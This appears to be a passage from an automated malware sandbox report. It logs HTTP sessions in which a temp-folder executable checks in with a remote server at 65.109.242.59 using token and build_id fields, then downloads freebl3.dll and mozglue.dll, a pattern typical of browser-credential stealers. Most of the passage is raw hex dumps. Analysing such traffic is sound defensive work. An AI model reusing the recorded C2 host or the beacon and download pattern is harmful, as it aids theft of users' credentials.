                                                          2024-05-26 22:28:08 UTC16384INData Raw: 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b 4c 24 10 4a d3 e2 09 96 c4 00 00 00 5f
                                                          Data Ascii: qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$L$J_
                                                          2024-05-26 22:28:08 UTC16384INData Raw: cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 56 ff 15 3c 20 24 10 a1 38 82 24 10 83
                                                          Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$$V< $8$


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          16192.168.2.54975665.109.242.594431436C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          TimestampBytes transferredDirectionData
                                                          2024-05-26 22:28:11 UTC278OUTPOST / HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----CFIJEBFCGDAAKFHIDBFI
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                          Host: 65.109.242.59
                                                          Content-Length: 829
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          2024-05-26 22:28:11 UTC829OUTData Raw: 2d 2d 2d 2d 2d 2d 43 46 49 4a 45 42 46 43 47 44 41 41 4b 46 48 49 44 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 33 66 61 38 35 36 30 33 62 39 36 66 36 35 63 64 64 64 66 39 30 38 62 35 34 33 65 66 39 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 4a 45 42 46 43 47 44 41 41 4b 46 48 49 44 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 4a 45 42 46 43 47 44 41 41 4b 46 48 49 44 42 46 49 0d 0a 43 6f 6e 74
                                                          Data Ascii: ------CFIJEBFCGDAAKFHIDBFIContent-Disposition: form-data; name="token"d23fa85603b96f65cdddf908b543ef9a------CFIJEBFCGDAAKFHIDBFIContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------CFIJEBFCGDAAKFHIDBFICont
                                                          2024-05-26 22:28:12 UTC158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 26 May 2024 22:28:11 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          2024-05-26 22:28:12 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 2ok0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          17192.168.2.54975865.109.242.594431436C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          TimestampBytes transferredDirectionData
                                                          2024-05-26 22:28:12 UTC278OUTPOST / HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----HIIIECAAKECFHIECBKJD
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                          Host: 65.109.242.59
                                                          Content-Length: 437
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          2024-05-26 22:28:12 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 33 66 61 38 35 36 30 33 62 39 36 66 36 35 63 64 64 64 66 39 30 38 62 35 34 33 65 66 39 61 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 0d 0a 43 6f 6e 74
                                                          Data Ascii: ------HIIIECAAKECFHIECBKJDContent-Disposition: form-data; name="token"d23fa85603b96f65cdddf908b543ef9a------HIIIECAAKECFHIECBKJDContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------HIIIECAAKECFHIECBKJDCont
                                                          2024-05-26 22:28:13 UTC158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 26 May 2024 22:28:13 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          2024-05-26 22:28:13 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 2ok0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          18192.168.2.54975965.109.242.594431436C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          TimestampBytes transferredDirectionData
                                                          2024-05-26 22:28:13 UTC278OUTPOST / HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----BGHJJDGHCBGDHIECBGID
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                          Host: 65.109.242.59
                                                          Content-Length: 437
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          2024-05-26 22:28:13 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 33 66 61 38 35 36 30 33 62 39 36 66 36 35 63 64 64 64 66 39 30 38 62 35 34 33 65 66 39 61 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 0d 0a 43 6f 6e 74
                                                          Data Ascii: ------BGHJJDGHCBGDHIECBGIDContent-Disposition: form-data; name="token"d23fa85603b96f65cdddf908b543ef9a------BGHJJDGHCBGDHIECBGIDContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------BGHJJDGHCBGDHIECBGIDCont
                                                          2024-05-26 22:28:14 UTC158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 26 May 2024 22:28:14 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          2024-05-26 22:28:14 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 2ok0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          19192.168.2.54976065.109.242.594431436C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          TimestampBytes transferredDirectionData
                                                          2024-05-26 22:28:15 UTC173OUTGET /freebl3.dll HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                          Host: 65.109.242.59
                                                          Cache-Control: no-cache
                                                          2024-05-26 22:28:15 UTC246INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 26 May 2024 22:28:15 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 685392
                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                          Connection: close
                                                          ETag: "6315a9f4-a7550"
                                                          Accept-Ranges: bytes
                                                          2024-05-26 22:28:15 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00
                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
                                                          2024-05-26 22:28:15 UTC16384INData Raw: 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3 01 89 5d 9c 8b 45 b8 03 85 30 ff ff ff 8b
                                                          Data Ascii: }1M1XM}}UU1M1UM] EH]EE|1E1EMMuuU1M1Mu]uM11U|uuMM1]1x]E0
                                                          2024-05-26 22:28:15 UTC16384INData Raw: 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90 07 00 83 c4 04 89 45 e8 ff 77 1c e8 42 90
                                                          Data Ascii: M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wPEwB
                                                          2024-05-26 22:28:15 UTC16384INData Raw: 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f a3 d6 73 3b 8b 75 18 83 fe 02 73 33 8b 7d
                                                          Data Ascii: 0C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwEs;us3}
                                                          2024-05-26 22:28:15 UTC16384INData Raw: 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89 cb 89 4d f0 8d 14 3e 81 c2 31 23 43 e4 0f
                                                          Data Ascii: ^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?UuM>1#C
                                                          2024-05-26 22:28:15 UTC16384INData Raw: 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00 00 77 12 31 c0 81 f9 00 01 00 00 0f 93 c0
                                                          Data Ascii: }EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w w1
                                                          2024-05-26 22:28:15 UTC16384INData Raw: 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7 85 7c ff ff ff 00 00 00 00 c7 85 6c ff ff
                                                          Data Ascii: $`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE|l
                                                          2024-05-26 22:28:15 UTC16384INData Raw: 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0 f7 65 f0 89 95 28 ff ff ff 89 85 30 ff ff
                                                          Data Ascii: eLXee0@eeeue0UEeeUeee $e(0
                                                          2024-05-26 22:28:15 UTC16384INData Raw: 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 ff 8d 1c 18 89 7d e4 83 d3 00 0f 92 45 8c
                                                          Data Ascii: MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE}E
                                                          2024-05-26 22:28:15 UTC16384INData Raw: ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 28 ff ff ff 8b b5 04 ff ff ff 81 e6 ff ff
                                                          Data Ascii: 0<48%8A)$(


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          20192.168.2.54976165.109.242.594431436C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          TimestampBytes transferredDirectionData
                                                          2024-05-26 22:28:18 UTC173OUTGET /mozglue.dll HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                          Host: 65.109.242.59
                                                          Cache-Control: no-cache
                                                          2024-05-26 22:28:19 UTC246INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 26 May 2024 22:28:19 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 608080
                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                          Connection: close
                                                          ETag: "6315a9f4-94750"
                                                          Accept-Ranges: bytes
                                                          2024-05-26 22:28:19 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00
                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
                                                          2024-05-26 22:28:19 UTC16384INData Raw: ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7 46 4c 00 00 00 00 c7 46 50 0f 00 00 00 c6 46
                                                          Data Ascii: A$P~#HbA$P~#HUVuF|FlNhFdFhFTNPFLFPF
                                                          2024-05-26 22:28:19 UTC16384INData Raw: 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff ff ff 56 e8 de bc ff ff 89 f1 89 fa e8 d5 f1
                                                          Data Ascii: PzEPWxP1`PHP$,FM1R'^_[]00L9tc<V
